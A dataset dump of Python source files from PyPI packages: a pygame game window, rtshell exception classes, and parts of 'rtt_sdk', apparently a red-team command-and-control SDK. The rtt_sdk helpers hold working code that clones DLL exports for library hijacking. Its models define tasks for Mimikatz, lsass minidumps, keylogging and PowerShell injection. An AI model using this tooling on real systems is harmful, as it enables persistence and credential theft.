code stringlengths 114 1.05M | path stringlengths 3 312 | quality_prob float64 0.5 0.99 | learning_prob float64 0.2 1 | filename stringlengths 3 168 | kind stringclasses 1
value |
|---|---|---|---|---|---|
from threading import Lock
import pygame
from rtsgame.src.Client.Camera import Camera
from rtsgame.src.Client.EntitySprite import EntitySprite
from rtsgame.src.Client.TextWidget import TextWidget
from rtsgame.src.Client.UI.Window import Window
from rtsgame.src.utility.constants import MOVE_UPDATE
from rtsgame.src.utility.utilities import Vector
class MainWindow(Window):
def __init__(self, size, sio=None):
super().__init__()
self.sio = sio
self.entities = []
self.lock = Lock()
self.main_camera = Camera(Vector(0, 0), size)
self.add_child(self.main_camera, Vector(0, 0))
self.spectate = False
pygame.time.set_timer(pygame.USEREVENT, MOVE_UPDATE)
def accept_event(self, event):
if self.spectate:
return
if event.type == pygame.USEREVENT:
state = pygame.key.get_pressed()
direction = Vector(0, 0)
if state[pygame.K_w]:
direction += Vector(0, -1)
if state[pygame.K_s]:
direction += Vector(0, 1)
if state[pygame.K_d]:
direction += Vector(1, 0)
if state[pygame.K_a]:
direction += Vector(-1, 0)
self.sio.emit('message', ("MOVE", tuple(direction)))
if event.type == pygame.KEYDOWN and event.key == pygame.K_f:
self.sio.emit('message', "ATTACK")
def enable_spectate(self):
spectate_text = TextWidget('Spectating')
self.main_camera.add_child(spectate_text, Vector(0, 900))
self.spectate = True
def accept_action(self, action):
if not isinstance(action, list):
raise RuntimeError(
"Action is not of type list. Don't know what to do with it")
if action[0] == 'SPECTATE':
self.enable_spectate()
else:
self.entities = [EntitySprite(info) for info in action]
with self.lock:
self.main_camera.set_hp(self.entities[0].health)
self.main_camera.set_center(self.entities[0].position)
self.main_camera.set_sprites(self.entities) | /src/Client/MainWindow.py | 0.656658 | 0.187802 | MainWindow.py | pypi |
import rtctree.path
class RtShellError(Exception):
'''Base error for all errors that may occur.'''
pass
class CallFailedError(Exception):
'''An interface call failed.'''
def __init__(self, msg):
self._msg = msg
def __str__(self):
return 'Interface call failed: {0}'.format(self._msg)
class RequiredActionFailedError(RtShellError):
'''Error raised when an action that must succeed fails.'''
def __init__(self, msg):
self._msg = msg
def __str__(self):
return 'Required action failed: {0}'.format(self._msg)
class PrecedingTimeoutError(RtShellError):
'''The time limit on a preceding condition being met has elapsed.'''
def __init__(self, msg):
self._msg = msg
def __str__(self):
return 'Preceding condition timed out: {0}'.format(self._msg)
class PlanExecutionError(RtShellError):
'''An error occurred executing a plan.'''
def __init__(self, error):
self._error = error
def __str__(self):
return 'Error executing plan:\n{0}'.format(self._error)
class EmptyConstExprError(RtShellError):
'''A constant expression that should be evaluated is empty.'''
def __str__(self):
return 'Empty constant expression '
class AmbiguousTypeError(RtShellError):
'''A data type is ambiguous.'''
def __init__(self, type):
self._type = type
def __str__(self):
return 'Ambiguous port type: {0}'.format(self._type)
class TypeNotFoundError(RtShellError):
'''A data type was not found.'''
def __init__(self, type):
self._type = type
def __str__(self):
return 'Type not found: {0}'.format(self._type)
class BadPortSpecError(RtShellError):
'''A port specification is badly formatted.'''
def __init__(self, ps):
self._ps = ps
def __str__(self):
return 'Bad port specification: {0}'.format(self._ps)
class SameNameDiffSpecError(RtShellError):
'''A port spec has a different property from another with the same name.'''
def __init__(self, ps):
self._ps = ps
def __str__(self):
return 'Port specification with same name has different properties: '\
'{0}'.format(self._ps)
class NoSuchObjectError(RtShellError):
'''The given path does not point to the necessary object.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'No such object: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'No such object: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'No such object: {0}'.format(self._path)
class NotAComponentOrManagerError(RtShellError):
'''A given path is not a component nor a manager.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a component or manager: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a component or manager: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a component or manager: {0}'.format(self._path)
class NotAComponentError(RtShellError):
'''A given path is not a component.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a component: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a component: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a component: {0}'.format(self._path)
class NotACompositeComponentError(RtShellError):
'''A given path is not a composite component.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a composite component: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a composite component: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a composite component: {0}'.format(self._path)
class NotAPortError(RtShellError):
'''A given path is not a port.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a port: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a port: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a port: {0}'.format(self._path)
class ParentNotADirectoryError(RtShellError):
'''A given path's parent is not a directory.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Parent not a directory: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Parent not a directory: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Parent not a directory: {0}'.format(self._path)
class NotADirectoryError(RtShellError):
'''A given path is not a directory.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a directory: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a directory: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a directory: {0}'.format(self._path)
class NotAPortError(RtShellError):
'''A given path is not a port.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a port: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a port: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a port: {0}'.format(self._path)
class NotAManagerError(RtShellError):
'''A given path is not a manager.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a manager: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a manager: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a manager: {0}'.format(self._path)
class NotInManagerError(RtShellError):
'''A component name does not exist in a manager.'''
def __init__(self, name):
self._name = name
def __str__(self):
return '{0} is not in the manager.'.format(self._name)
class UndeletableObjectError(RtShellError):
'''Some objects cannot be deleted.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Undeletable object: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Undeletable object: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Undeletable object: {0}'.format(self._path)
class NotZombieObjectError(RtShellError):
'''A given path does not point to a zombie.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Not a zombie object: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Not a zombie object: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Not a zombie object: {0}'.format(self._path)
class ZombieObjectError(RtShellError):
'''A given path points to a zombie.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Zombie object: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Zombie object: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Zombie object: {0}'.format(self._path)
class UnknownObjectError(RtShellError):
'''A given path points to an unknown object.'''
def __init__(self, path):
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'Unknown object: {0}'.format(
rtctree.path.format_path(self._path))
elif type(self._path) == list:
return 'Unknown object: {0}'.format(
rtctree.path.format_path((self._path, None)))
else:
return 'Unknown object: {0}'.format(self._path)
class NoDestPortError(RtShellError):
'''A required destination port was not specified.'''
def __str__(self):
return 'No destination port specified.'
class NoSourcePortError(RtShellError):
'''A required source port was not specified.'''
def __str__(self):
return 'No source port specified.'
class CannotDoToPortError(RtShellError):
'''The action cannot be performed on a port.'''
def __init__(self, action):
self._action = action
def __str__(self):
return 'Cannot {0} ports.'.format(self._action)
class PortNotFoundError(RtShellError):
'''The port was not found on the component.'''
def __init__(self, rtc, port):
self._rtc = rtc
self._port = port
def __str__(self):
return 'Port not found: {0}'.format(
rtctree.path.format_path((self._rtc, self._port)))
class ConnectionNotFoundError(RtShellError):
'''A connection between two ports was not found.'''
def __init__(self, path1, path2):
self._path1 = path1
self._path2 = path2
def __str__(self):
if type(self._path1) == tuple:
path1_str = rtctree.path.format_path(self._path1)
elif type(self._path1) == list:
path1_str = rtctree.path.format_path((self._path1, None))
else:
path1_str = self._path1
if type(self._path2) == tuple:
path2_str = rtctree.path.format_path(self._path2)
elif type(self._path2) == list:
path2_str = rtctree.path.format_path((self._path2, None))
else:
path2_str = self._path2
return 'No connection from {0} to {1}'.format(path1_str, path2_str)
class MultiConnectionNotFoundError(RtShellError):
'''A connection between ports was not found.'''
def __str__(self):
return 'No connection found involving the specified ports.'''
class ConnectionIDNotFoundError(RtShellError):
'''The port was not found on the component.'''
def __init__(self, id, path):
self._id = id
self._path = path
def __str__(self):
if type(self._path) == tuple:
return 'No connection from {0} with ID {1}'.format(
rtctree.path.format_path(self._path), self._id)
elif type(self._path) == list:
return 'No connection from {0} with ID {1}'.format(
rtctree.path.format_path((self._path, None)), self._id)
else:
return 'No connection from {0} with ID {1}'.format(self._path,
self._id)
class DuplicateConnectionError(RtShellError):
'''An identical connection already exists.'''
def __init__(self, ports):
self._ports = ports
def __str__(self):
return 'An identical connection already exists between ports {}'.format(
self._ports)
class DuplicateConnectionIDError(RtShellError):
'''A connection with that ID already exists.'''
def __init__(self, conn_id):
self._conn_id = conn_id
def __str__(self):
return 'A connection with ID {} already exists between the ' \
'specified ports'.format(self._conn_id)
class DuplicateConnectionNameError(RtShellError):
'''A connection with that name already exists.'''
def __init__(self, conn_name, port_name):
self._conn_name = conn_name
self._port_name = port_name
def __str__(self):
return 'A connection with name {} already exists from the ' \
'specified port {}'.format(self._conn_name, self._port_name)
class BadPortTypeError(RtShellError):
'''The port type is not defined.'''
def __init__(self, rtc, port):
self._rtc = rtc
self._port = port
def __str__(self):
return 'Incorrect port type: {0}'.format(
rtctree.path.format_path((self._rtc, self._port)))
class MissingCompError(RtShellError):
'''An expected component is missing.'''
def __init__(self, path):
self._path = path
def __str__(self):
return 'Expected component missing: {0}'.format(self._path)
class ConnectFailedError(RtShellError):
'''An error occured connecting two ports.'''
def __init__(self, rtc, port):
self._rtc = rtc
self._port = port
def __str__(self):
return 'Failed to connect port: {0}'.format(
rtctree.path.format_path((self._rtc, self._port)))
class ActivateError(RtShellError):
'''An error occured activating a component.'''
def __init__(self, comp):
self._comp = comp
def __str__(self):
return 'Error activating component: {0}'.format(self._comp)
class DeactivateError(RtShellError):
'''An error occured deactivating a component.'''
def __init__(self, comp):
self._comp = comp
def __str__(self):
return 'Error deactivating component: {0}'.format(self._comp)
class PortNotInputError(RtShellError):
'''A port is not an input that should be.'''
def __init__(self, name):
self._name = name
def __str__(self):
return 'Port is not input: {0}'.format(self._name)
class PortNotOutputError(RtShellError):
'''A port is not an output that should be.'''
def __init__(self, name):
self._name = name
def __str__(self):
return 'Port is not output: {0}'.format(self._name)
class ImportFormatterError(RtShellError):
'''An error occured importing a formatting function.'''
def __init__(self, exc):
self._exc = exc
def __str__(self):
return 'Error importing formatter: {0}'.format(self._exc)
class BadFormatterError(RtShellError):
'''The imported formatter is bad (most likely not a function).'''
def __init__(self, fun):
self._fun = fun
def __str__(self):
return 'Bad formatter: {0}'.format(self._fun)
class MissingPOAError(RtShellError):
'''A data type from a module was used without a matching POA loaded.'''
def __init__(self, mod):
self._mod = mod
def __str__(self):
return 'Missing POA module: {0}'.format(self._mod)
class NoConfSetError(RtShellError):
'''The specified configuration set does not exist.'''
def __init__(self, name):
self._name = name
def __str__(self):
return 'No such configuration set: {0}'.format(self._name)
class BadStartPointError(RtShellError):
'''A given start point for the log is outside the bounds.'''
def __str__(self):
return 'Start time/index out of bounds.'
class BadEndPointError(RtShellError):
'''A given end point for the log is outside the bounds.'''
def __str__(self):
return 'End time/index out of bounds.'
class BadLogTypeError(RtShellError):
'''An invalid logger type was chosen.'''
def __init__(self, type):
self._type = type
def __str__(self):
return 'Invalid logger type: {0}'.format(self._type)
class UnsupportedLogTypeError(RtShellError):
'''The selected log type doesn't support the desired feature.'''
def __init__(self, type, feature):
self._type = type
self._feature = feature
def __str__(self):
return 'Log type "{0}" does not support feature {1}.'.format(
self._type, self._feature)
class NoLogFileNameError(RtShellError):
'''An expected file name was not provided.'''
def __str__(self):
return 'No log file specified.'
class BadMgrAddressError(RtShellError):
'''A bad corbaloc address was given.'''
def __str__(self):
return 'Invalid corbaloc URL.'
class FailedToNarrowError(RtShellError):
'''Failed to narrow a CORBA object reference.'''
def __str__(self):
return 'Failed to narrow CORBA object reference.'
class CannotRemoveFromNewCompositionError(RtShellError):
'''Cannot remove components/ports from a new composition.'''
def __str__(self):
return 'Cannot remove components/ports from a new composition.'
# vim: tw=79 | /rtshell_aist-4.2.9-py3-none-any.whl/rtshell/rts_exceptions.py | 0.700178 | 0.204104 | rts_exceptions.py | pypi |
import copy
import re
import struct
from typing import Any, Dict, List, Union
import pefile
from rtt_sdk.models import Architecture, FileOrDirectory, Process, TaskDelivery, TaskStatus
# Read_Only | Initialized_Data
DEFAULT_CHARACTERISTICS = 0x40000040
SECTION_NAME = 8
MACHINE_IA64 = 512
MACHINE_AMD64 = 34404
def _align_up(value: int, align: int = 0x1000) -> int:
return (value + align - 1) & ~(align - 1)
def _is_64bit_dll(data: bytes) -> bool:
header_offset = struct.unpack("<L", data[60:64])[0]
machine = struct.unpack("<H", data[header_offset + 4 : header_offset + 4 + 2])[0]
if machine == MACHINE_IA64 or machine == MACHINE_AMD64:
return True
return False
def _add_section(pe: pefile.PE, name: str, size: int, characteristics: int = DEFAULT_CHARACTERISTICS):
# Sanity checks
if len(name) > SECTION_NAME:
raise ValueError("Section name is too long")
section_header_size = pefile.Structure(pefile.PE.__IMAGE_SECTION_HEADER_format__).sizeof()
section_header_off = pe.sections[-1].get_file_offset() + section_header_size
if section_header_off + section_header_size > pe.OPTIONAL_HEADER.SizeOfHeaders: # type: ignore
raise ValueError("Not enough room for another SECTION_HEADER")
# Calculate/Align sizes
virtual_size = _align_up(size, pe.OPTIONAL_HEADER.SectionAlignment) # type: ignore
virtual_addr = _align_up(
pe.sections[-1].VirtualAddress + pe.sections[-1].Misc_VirtualSize,
pe.OPTIONAL_HEADER.SectionAlignment, # type: ignore
)
raw_size = _align_up(size, pe.OPTIONAL_HEADER.FileAlignment) # type: ignore
raw_ptr = _align_up(
pe.sections[-1].PointerToRawData + pe.sections[-1].SizeOfRawData,
pe.OPTIONAL_HEADER.FileAlignment, # type: ignore
)
# Configure section properties
section = pefile.SectionStructure(pe.__IMAGE_SECTION_HEADER_format__, pe=pe)
section.set_file_offset(section_header_off)
section.Name = name.encode().ljust(SECTION_NAME, b"\x00")
section.VirtualAddress = virtual_addr
section.PointerToRawData = raw_ptr
section.Misc = section.Misc_VirtualSize = virtual_size
section.SizeOfRawData = raw_size
section.Characteristics = characteristics
section.PointerToRelocations = 0
section.NumberOfRelocations = 0
section.NumberOfLinenumbers = 0
section.PointerToLinenumbers = 0
# Correct headers
pe.FILE_HEADER.NumberOfSections += 1 # type: ignore
pe.OPTIONAL_HEADER.SizeOfImage = virtual_addr + virtual_size # type: ignore
# Add buffer padding
pe.__data__ += b"\x00" * raw_size
# Append to ensure overwrite
pe.__structures__.append(section)
# Recreate to save our changes
pe = pefile.PE(data=pe.write())
return pe, section
def _clone_exports(tgt: pefile.PE, ref: pefile.PE, ref_path: str, new_section_name: str = ".rdata2"):
# Forwards typically don't supply the extension
ref_path = ref_path.replace(".dll", "")
ref = copy.deepcopy(ref)
tgt = copy.deepcopy(tgt)
ref_export_dir = ref.OPTIONAL_HEADER.DATA_DIRECTORY[0] # type: ignore
if not ref_export_dir.Size:
raise ValueError("Reference binary has no exports")
exp_names = [
ref_path.encode() + b"." + e.name if e.name else ref_path.encode() + b".#" + str(e.ordinal).encode()
for e in sorted(ref.DIRECTORY_ENTRY_EXPORT.symbols, key=lambda x: x.ordinal) # type: ignore
]
exp_names_blob = b"\x00".join(exp_names) + b"\x00"
new_section_size = ref_export_dir.Size + len(exp_names_blob)
tgt, section = _add_section(tgt, new_section_name, new_section_size)
final_rva = section.VirtualAddress # type: ignore
# Capture the reference export directory
export_dir = ref.__unpack_data__(
pefile.PE.__IMAGE_EXPORT_DIRECTORY_format__,
ref.get_data(
ref_export_dir.VirtualAddress, pefile.Structure(pefile.PE.__IMAGE_EXPORT_DIRECTORY_format__).sizeof()
),
file_offset=0, # we don't need this
)
# Calculate our delta
delta = final_rva - ref_export_dir.VirtualAddress
# Apply RVA delta to export names
for i in range(export_dir.NumberOfNames): # type: ignore
ref.set_dword_at_rva(
export_dir.AddressOfNames + 4 * i, # type: ignore
ref.get_dword_at_rva(export_dir.AddressOfNames + 4 * i) + delta, # type: ignore
)
# Link function addresses to forward names
forward_offset = ref_export_dir.VirtualAddress + ref_export_dir.Size + delta
true_offset = 0
for i in range(export_dir.NumberOfFunctions): # type: ignore
if not ref.get_dword_at_rva(export_dir.AddressOfFunctions + 4 * i): # type: ignore
continue # This function is hollow (never used)
forward_name = exp_names[true_offset]
ref.set_dword_at_rva(export_dir.AddressOfFunctions + 4 * i, forward_offset) # type: ignore
forward_offset += len(forward_name) + 1 # +1 for null byte
true_offset += 1
# Apply RVA delta to directory
export_dir.AddressOfFunctions += delta # type: ignore
export_dir.AddressOfNames += delta # type: ignore
export_dir.AddressOfNameOrdinals += delta # type: ignore
# Write in our new export directory
tgt.set_bytes_at_rva(final_rva, ref.get_data(ref_export_dir.VirtualAddress, ref_export_dir.Size) + exp_names_blob)
tgt.set_bytes_at_rva(final_rva, export_dir.__pack__())
# Rebuild from bytes to save back
tgt = pefile.PE(data=tgt.__data__)
# Update directory specs
tgt_export_dir = tgt.OPTIONAL_HEADER.DATA_DIRECTORY[0] # type: ignore
tgt_export_dir.VirtualAddress = section.VirtualAddress # type: ignore
tgt_export_dir.Size = new_section_size
tgt = pefile.PE(data=tgt.write())
return tgt
def recurse_encode_bytes(d: Any, encoding: str = "utf-8"):
if isinstance(d, dict):
x = {}
for k, v in d.items():
if isinstance(v, (dict, list)):
v = recurse_encode_bytes(v)
elif isinstance(v, bytes):
v = v.decode(encoding)
x[k] = v
return x
elif isinstance(d, list):
x = []
for v in d:
if isinstance(v, (dict, list)):
v = recurse_encode_bytes(v)
elif isinstance(v, bytes):
v = v.decode(encoding)
x.append(v)
return x
return d
def clone_exports(tgt_bytes: bytes, ref_bytes: bytes, ref_path: str, new_section_name: str = ".rdata2") -> bytes:
"""
Clones the export table from one (reference) DLL to another (target) DLL.
Functionality will be proxied using export fowarding.
:param byte tgt_bytes: Target PE bytes for cloning
:param byte ref_bytes: Reference PE bytes to clone from
:param str ref_path: Path of the reference library during the hijack
:param str new_section_name: PE section name if a new section is required (Default = '.rdata2')
:returns: Updated PE bytes
:rtype: bytes
"""
cloned_pe = _clone_exports(pefile.PE(data=tgt_bytes), pefile.PE(data=ref_bytes), ref_path, new_section_name)
return cloned_pe.write() or b""
def convert_path_for_architecture(arch: Architecture, path: str) -> str:
match = re.findall(r"\\([fF]ramework(?:64)?)\\", path)
if match:
if arch == Architecture.x64:
path = path.replace(match[0], "Framework64")
elif arch == Architecture.x86:
path = path.replace(match[0], "Framework")
else:
raise ValueError("Could not convert path")
else:
path = path.replace("x86", arch.value)
path = path.replace("x64", arch.value)
return path
def invert_architecture(arch: Architecture):
if arch == Architecture.x64:
return Architecture.x86
elif arch == Architecture.x86:
return Architecture.x64
else:
raise ValueError("Could not invert architecture")
def architecture_from_directory(directory: Union[str, Dict[str, Any], List[str], List[FileOrDirectory]]):
"""
Derive architecture from a directory listing (usually C:\\)
"""
if isinstance(directory, dict):
directory = list(directory.keys())
elif all(isinstance(x, FileOrDirectory) for x in directory):
directory = [f.name for f in directory] # type: ignore
if "Program Files (x86)" in directory:
return Architecture.x64
elif "Program Files" in directory:
return Architecture.x86
raise ValueError("Dir does not look like a root directory listing")
def architecture_from_process_list(ps: Union[str, List[Process]]):
"""
Derive architecture from a process listing
"""
if isinstance(ps, str):
if " x64 " in ps:
return Architecture.x64
elif " x86 " in ps:
return Architecture.x86
else:
if [p for p in ps if p.arch == Architecture.x64]:
return Architecture.x64
elif [p for p in ps if p.arch == Architecture.x86]:
return Architecture.x86
raise ValueError("ps does not look like a process list")
def architecture_from_pe_bytes(pe_bytes: bytes):
"""
Derive architecture from PE file bytes
"""
if pe_bytes[:2] != b"MZ":
raise ValueError("File does not look like a PE")
return Architecture.x64 if _is_64bit_dll(pe_bytes) else Architecture.x86
def architecture_from_pe_path(pe_path: str):
"""
Derive architecture from a local PE file
"""
return architecture_from_pe_bytes(open(pe_path, "rb").read())
def is_task_finished(delivery: TaskDelivery) -> bool:
return delivery in [TaskDelivery.completed, TaskDelivery.blocked, TaskDelivery.invalid]
def is_task_failed(status: TaskStatus) -> bool:
return status in [TaskStatus.failure, TaskStatus.warning, TaskStatus.critical] | /rtt_sdk-0.2.0-py3-none-any.whl/rtt_sdk/helpers.py | 0.707101 | 0.208058 | helpers.py | pypi |
from __future__ import annotations
from datetime import datetime
from enum import Enum
from typing import Any, Dict, List, Optional
from uuid import UUID
from pydantic import Field
from .schema import Schema
class AccessToken(Schema):
access_token: str = Field(..., title="Access Token")
token_type: str = Field(..., title="Token Type")
class ApiConfig(Schema):
api_version: str = Field(..., alias="apiVersion", title="Apiversion")
app_version: str = Field(..., alias="appVersion", title="Appversion")
env: str = Field(..., title="Env")
storage_url: str = Field(..., alias="storageUrl", title="Storageurl")
class Architecture(str, Enum):
x86 = "x86"
x64 = "x64"
class BlobReferenceRoot(Schema):
id: Optional[str] = Field(None, description="Blob identifier", title="Id")
name: Optional[str] = Field(None, description="Contextual name", title="Name")
data: Optional[bytes] = Field(None, description="Raw data", title="Data")
class BodyCreateBlobApiBlobsPost(Schema):
data: bytes = Field(..., title="Data")
class BodyLoginApiAuthTokenPost(Schema):
grant_type: Optional[str] = Field(None, regex="password", title="Grant Type")
username: str = Field(..., title="Username")
password: str = Field(..., title="Password")
scope: Optional[str] = Field("", title="Scope")
client_id: Optional[str] = Field(None, title="Client Id")
client_secret: Optional[str] = Field(None, title="Client Secret")
class Camera(Schema):
id: int = Field(..., description="Camera ID", example=1, title="Id")
name: Optional[str] = Field(None, description="Camera Name", example="Logitech C120", title="Name")
class CameraCaptureArguments(Schema):
camera_id: int = Field(
...,
alias="cameraId",
description="Target camera ID",
example=1,
title="Cameraid",
)
quality: Optional[int] = Field(
25,
description="Capture quality level",
example=25,
ge=1.0,
le=99.0,
title="Quality",
)
class CameraListArguments(Schema):
pass
class ClientScriptArguments(Schema):
name: str = Field(..., description="Script name", example="pivot.py", title="Name")
arguments: Optional[str] = Field(
"",
description="Script arguments",
example="--host MACHINE-A",
title="Arguments",
)
class ClientScriptToken(Schema):
access_token: str = Field(..., title="Access Token")
token_type: str = Field(..., title="Token Type")
task_id: UUID = Field(..., title="Task Id")
class ContentHint(str, Enum):
text = "text"
image = "image"
class ContextIdleArguments(Schema):
pass
class ContextProcessArguments(Schema):
pass
class ContextUserArguments(Schema):
verbose: Optional[bool] = Field(
False,
description="Provide verbose information about the current token",
example=False,
title="Verbose",
)
class DiscoveredInstance(Schema):
path: str = Field(..., description="Path of discovery", example="mypipe1", title="Path")
tag: str = Field(..., description="Instance tag", example="jPc4dpYI", title="Tag")
class DotNetFrameworkVersion(str, Enum):
field_2 = "2"
field_4 = "4"
unknown = "unknown"
class ExitArguments(Schema):
pass
class FileChangeDirectoryArguments(Schema):
directory: Optional[str] = Field(
"",
description="New directory (leave empty/ommit to retrieve current)",
example="C:\\Windows",
title="Directory",
)
class FileCopyArguments(Schema):
source: str = Field(
...,
description="Remote source file path (supports environment variables)",
example="C:\\source.ext",
title="Source",
)
destination: str = Field(
...,
description="Remote destination file path (supports environment variables)",
example="%WINDIR%\\destination.ext",
title="Destination",
)
force: Optional[bool] = Field(
False,
description="Overwrite the target file if needed",
example=False,
title="Force",
)
class FileDownloadArguments(Schema):
path: str = Field(
...,
description="Remote file path (supports environment variables)",
example="C:\\Windows\\win.ini",
title="Path",
)
print: Optional[bool] = Field(
False,
description="Request to print the results directly when possible",
title="Print",
)
class FileMakeDirectoryArguments(Schema):
path: str = Field(
...,
description="Remote directory path (supports environment variables)",
example="C:\\temporary",
title="Path",
)
class FileMoveArguments(Schema):
source: str = Field(
...,
description="Remote source file path (supports environment variables)",
example="C:\\source.ext",
title="Source",
)
destination: str = Field(
...,
description="Remote destination file path (supports environment variables)",
example="%WINDIR%\\destination.ext",
title="Destination",
)
force: Optional[bool] = Field(
False,
description="Overwrite the target file if needed",
example=False,
title="Force",
)
class FileOrDirectory(Schema):
name: str = Field(..., description="File/Directory name", example="win.ini", title="Name")
is_dir: Optional[bool] = Field(
False,
alias="isDir",
description="Object is a directory",
example=False,
title="Isdir",
)
time: datetime = Field(
...,
description="Last queried time metric (access, create, write)",
example="2000-01-02T03:04:05",
title="Time",
)
size: Optional[int] = Field(None, description="File size in bytes ", example=1423, title="Size")
class FileRemoveArguments(Schema):
path: str = Field(
...,
description="Remote file path (supports environment variables)",
example="%WINDIR%\\temporary.ext",
title="Path",
)
force: Optional[bool] = Field(False, description="Overwrite the target file if needed", title="Force")
class FileRemoveDirectoryArguments(Schema):
path: str = Field(
...,
description="Remote directory path (supports environment variables)",
example="C:\\temporary",
title="Path",
)
class HostPowershellArguments(Schema):
base_url: Optional[str] = Field(
"",
alias="baseUrl",
description="Base URL (default is from profile)",
example="http://mycustom.com",
title="Baseurl",
)
local: Optional[bool] = Field(True, description="Remain in the local process after load", title="Local")
process: Optional[str] = Field(
"",
description="Process to inject into (not compatible with -l/--local)",
title="Process",
)
com_object: Optional[bool] = Field(
False,
alias="comObject",
description="Use IE com object to download payload (useful for stealth/proxies)",
title="Comobject",
)
endpoint: Optional[str] = Field(
"",
description="Web endpoint path to host data",
example="/custom",
title="Endpoint",
)
class HostUnloadArguments(Schema):
pass
class HostingEncoding(str, Enum):
none = "none"
base64 = "base64"
hex = "hex"
class InfoArguments(Schema):
pass
class InjectionTechnique(str, Enum):
standard = "standard"
setthreadcontext = "setthreadcontext"
class InstanceInUpdate(Schema):
name: str = Field(..., max_length=100, title="Name")
hidden: bool = Field(..., title="Hidden")
class KerberosPurgeArguments(Schema):
pass
class KeylogGatherArguments(Schema):
path: Optional[str] = Field(
"",
description="Encrypted keylog file location (otherwise assumed profile['keylogger']['storage_path'])",
example="C:\\Users\\Public\\log.dat",
title="Path",
)
class LinkArguments(Schema):
target: str = Field(
...,
description="Target IP, hostname, or address",
example="localhost",
title="Target",
)
class ManagedModuleExecuteArguments(Schema):
version: Optional[DotNetFrameworkVersion] = Field(
"unknown",
description="Framework version for hosting (otherwise assumed from instance version)",
example="4",
)
input: str = Field(
...,
description="Input to managed module",
example="run download",
title="Input",
)
method: str = Field(
...,
description="Fully qualified method name",
example="Namespace.Class.Method",
title="Method",
)
class ManagedModuleUnloadArguments(Schema):
version: Optional[DotNetFrameworkVersion] = Field(
"unknown",
description="Framework version for hosting (otherwise assumed from instance version)",
example="4",
)
class MimikatzExecuteArguments(Schema):
input: str = Field(..., description="Input to Mimikatz module", example="version", title="Input")
class MimikatzLoadArguments(Schema):
pass
class MinidumpArguments(Schema):
path: str = Field(
...,
description="Remote file path (supports environment variables)",
example="%TEMP%\\proc.dmp",
title="Path",
)
process: Optional[str] = Field(
"",
description="Process name/pid to dump (otherwise local)",
example="lsass.exe",
title="Process",
)
class NativeModuleExecuteArguments(Schema):
input: str = Field(..., description="Input to native module", example="version", title="Input")
export: str = Field(
...,
description="Exported function name from module (first match)",
example="MyExport",
title="Export",
)
class NativeModuleUnloadArguments(Schema):
pass
class NetworkConnectArguments(Schema):
hosts: str = Field(
...,
description="IP address(s) in single, range, or CIDR format",
example="192.168.1.1/26",
title="Hosts",
)
port: int = Field(..., description="Destination port", example="3389", title="Port")
timeout: Optional[int] = Field(1000, description="TCP timeout in ms", example=1000, title="Timeout")
class NetworkEnumerateSessionArguments(Schema):
host: str = Field(..., description="Hostname or IP address", example="REMOTE-PC", title="Host")
class NetworkPingArguments(Schema):
host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")
class NetworkResolveArguments(Schema):
host: str = Field(..., description="Hostname", example="ADAM-PC", title="Host")
class PowershellBaseArguments(Schema):
version: Optional[DotNetFrameworkVersion] = Field(
"unknown",
description="Framework version for hosting (otherwise assumed from instance version)",
example="4",
)
class PowershellExecuteArguments(Schema):
version: Optional[DotNetFrameworkVersion] = Field(
"unknown",
description="Framework version for hosting (otherwise assumed from instance version)",
example="4",
)
input: str = Field(
...,
description="Input to Powershell module",
example="Get-Host | ft",
title="Input",
)
class PowershellLoadArguments(Schema):
version: Optional[DotNetFrameworkVersion] = Field(
"unknown",
description="Framework version for hosting (otherwise assumed from instance version)",
example="4",
)
class PowershellUnstageArguments(Schema):
pass
class Process(Schema):
ppid: int = Field(..., description="Parent process id", example=567, title="Ppid")
pid: int = Field(..., description="Process id", example=432, title="Pid")
sess: int = Field(..., description="Session id", example=1, title="Sess")
